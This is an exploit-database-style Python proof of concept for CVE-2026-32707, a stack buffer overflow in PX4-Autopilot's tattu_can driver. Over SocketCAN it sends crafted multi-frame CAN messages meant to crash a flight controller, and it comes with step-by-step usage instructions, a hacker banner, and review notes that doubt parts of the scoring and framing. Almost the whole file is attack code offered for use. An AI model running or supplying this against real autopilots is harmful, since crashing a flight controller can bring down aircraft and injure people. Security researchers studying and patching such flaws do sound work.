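#!/usr/bin/env python3
# Exploit Title: PX4-Autopilot tattu_can Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32707
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected: versions <= 1.17.0-rc1 (tattu_can driver)
# Tested on: Ubuntu 22.04 / PX4 SITL with vcan0
# Category: Denial of Service (DoS)
# Platform: Linux (SocketCAN)
# Exploit Type: Stack Overflow
# CVSS: 7.5 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
#   NOTE(review): AV:N is at odds with the precondition stated in the
#   description below (the attacker needs CAN bus access); bus-adjacent or
#   physical access is normally scored AV:A or AV:P. Confirm the vector
#   against the published advisory before quoting it.
# CWE: CWE-121 (Stack-based Buffer Overflow)
# Description: The tattu_can driver in PX4-Autopilot versions <= 1.17.0-rc1
#   performs an unbounded memcpy when reassembling multi-frame CAN messages,
#   allowing an attacker with CAN bus access to corrupt the stack and crash
#   the autopilot.
# Fixed in: commit 3f04b7a (PX4-Autopilot 1.17.0-rc2)
#
# Usage:
#   python3 exploit.py <can-interface>
# Examples:
#   python3 exploit.py vcan0
#   python3 exploit.py can0
# Options:
#   <can-interface>  name of the SocketCAN network interface (e.g. vcan0, can0)
# Notes:
#   - Requires the python-can library: pip install python-can
#   - Run with root privileges (CAP_NET_RAW); creating a vcan interface with
#     'ip link add' additionally needs CAP_NET_ADMIN.
#   - The target must have tattu_can started (e.g. 'tattu_can start') and be
#     attached to the same bus.
#   - This script only transmits. It receives nothing back from the target,
#     so "Attack sequence completed" means the frames left the socket, not
#     that the driver crashed -- confirm on the autopilot's console/log.
#   - A successful run crashes the flight controller; only use it against
#     hardware you own or are authorised to test.
# How to use:
#   Step 1: Install python-can: pip install python-can
#   Step 2: Create a virtual CAN if needed:
#           sudo ip link add dev vcan0 type vcan && sudo ip link set up vcan0
#   Step 3: Run: sudo python3 exploit.py vcan0

import sys
import time

import can

# Bit 7 of a DroneCAN/UAVCAN-style tail byte: start-of-transfer. The first
# frame carries it so the driver opens a fresh multi-frame reassembly.
TAIL_BYTE_START_OF_TRANSFER = 0x80
# Presumed size of the driver's reassembly buffer. Not used by the code below;
# kept so the frame count can be sanity-checked against it.
# TODO confirm against the tattu_can source.
TATTLES_STRUCT_SIZE = 48
# Unused in this script; retained from the original PoC. TODO confirm meaning.
START_OFFSET = 5
# Classic CAN carries at most 8 data bytes per frame. The last byte of each
# frame is the tail byte, so a full frame contributes OVERFLOW_DLC - 1 payload
# bytes if the driver copies DLC - 1 bytes per frame (as the author states).
OVERFLOW_DLC = 8
# Extended (29-bit) arbitration ID used for every frame of the transfer.
CAN_ID = 0x123
# Filler frames sent between the start-of-transfer frame and the final frame.
# Total bytes offered for copy: 7 (SOT) + 7 * 7 (fillers) + 7 (final) = 63,
# which exceeds TATTLES_STRUCT_SIZE.
OVERFLOW_FRAME_COUNT = 7

# Banner, one entry per line inside the box. Leading spaces provide the
# alignment; _boxed() adds the trailing padding and the border.
_BANNER_LINES = [
    "",
    "           ██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗ ",
    "           ██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗",
    "           ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝",
    "           ██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗",
    "           ██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║",
    "           ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝",
    "",
    "                           [ b a n y a m e r _ s e c u r i t y ]",
    "",
    "                    ▸ Silent Hunter | Shadow Presence | Digital Intel ◂",
    "",
    "    Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴",
    "    Handle   : @banyamer_security",
    "",
    "    Exploit  : CVE-2026-32707",
    "    Target   : PX4-Autopilot • tattu_can driver • CAN bus",
    "",
    "    Status   : ACTIVE",
    "",
]


def _boxed(lines: list[str], width: int = 92) -> str:
    """Frame *lines* in a box-drawing border, padding each line to *width*.

    Padding is done with str.ljust, i.e. by code point; wide glyphs (the
    flag emoji) may render one column off, which is cosmetic only.
    """
    top = "╔" + "═" * width + "╗"
    bottom = "╚" + "═" * width + "╝"
    body = [f"║{line.ljust(width)}║" for line in lines]
    return "\n".join([top, *body, bottom])


def _make_frame(data: list[int]) -> can.Message:
    """Build one classic (non-FD) extended-ID CAN frame carrying *data*.

    *data* must be at most 8 bytes; dlc is derived from its length.
    """
    # is_extended_id=True makes the SocketCAN backend set the EFF flag itself.
    # OR-ing CAN_EFF_FLAG into arbitration_id as well (as the original PoC did)
    # is redundant, pushes the ID outside the 29-bit range python-can
    # validates, and relies on a constant that is not exported from the
    # top-level `can` package in every python-can release.
    return can.Message(
        arbitration_id=CAN_ID,
        data=data,
        is_extended_id=True,
        dlc=len(data),
    )


def build_attack_frames() -> list[can.Message]:
    """Return the frames in transmit order: SOT frame, fillers, final frame.

    The start-of-transfer frame carries 7 payload bytes plus a tail byte with
    bit 7 set. Each filler frame is 8 copies of one ASCII letter; the final
    frame is 8 x 0x42.

    NOTE(review): in DroneCAN-style framing the last byte of every filler and
    of the final frame (0x41..0x47, 0x42) would itself be read as a tail byte
    with bit 6 (end-of-transfer) set and bit 7 clear. Whether tattu_can
    honours those bits before copying is not verified here; if the target
    does not crash, that is the first thing to check in the driver source.
    """
    frames = [
        _make_frame(
            [0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x00, TAIL_BYTE_START_OF_TRANSFER]
        )
    ]
    for i in range(OVERFLOW_FRAME_COUNT):
        frames.append(_make_frame([ord('A') + (i % 26)] * OVERFLOW_DLC))
    frames.append(_make_frame([0x42] * OVERFLOW_DLC))
    return frames


def main() -> None:
    """Open the CAN interface named on the command line and send the frames.

    Exits with status 1 on bad arguments, if the interface cannot be opened,
    or if a transmit fails. The bus is always shut down, even on error.
    """
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <can-interface>")
        sys.exit(1)

    iface = sys.argv[1]
    try:
        # python-can 4.x prefers interface='socketcan'; bustype= is kept here
        # because it still works (with a deprecation warning) and also runs
        # on python-can 3.x.
        bus = can.interface.Bus(channel=iface, bustype='socketcan', fd=False)
    except Exception as e:  # broad on purpose: backend/OS/config errors all
        # surface as different exception types and all mean "cannot continue".
        print(f"Failed to open CAN interface {iface}: {e}")
        sys.exit(1)

    frames = build_attack_frames()
    try:
        print(f"[*] Sending start-of-transfer frame on {iface} (can_id=0x{CAN_ID:08X})")
        bus.send(frames[0])

        print(f"[*] Sending {OVERFLOW_FRAME_COUNT} overflow frames "
              f"(each copies {OVERFLOW_DLC - 1} bytes)...")
        for frame in frames[1:-1]:
            bus.send(frame)
            # Small gap so the frames are not coalesced/dropped on the way out.
            time.sleep(0.01)

        print("[*] Sending final overflow frame...")
        bus.send(frames[-1])
    except (can.CanError, OSError) as e:
        # e.g. ENOBUFS / interface went down mid-run; report instead of a
        # traceback so the operator knows the sequence was incomplete.
        print(f"[-] Transmit failed on {iface}: {e}")
        sys.exit(1)
    finally:
        # Release the socket whether or not every frame went out.
        bus.shutdown()

    # Only means the frames left this host; see the Notes in the header.
    print("[+] Attack sequence completed. The PX4 tattu_can driver should now crash.")


# Printed at import time, as in the original PoC.
print(_boxed(_BANNER_LINES))


if __name__ == "__main__":
    main()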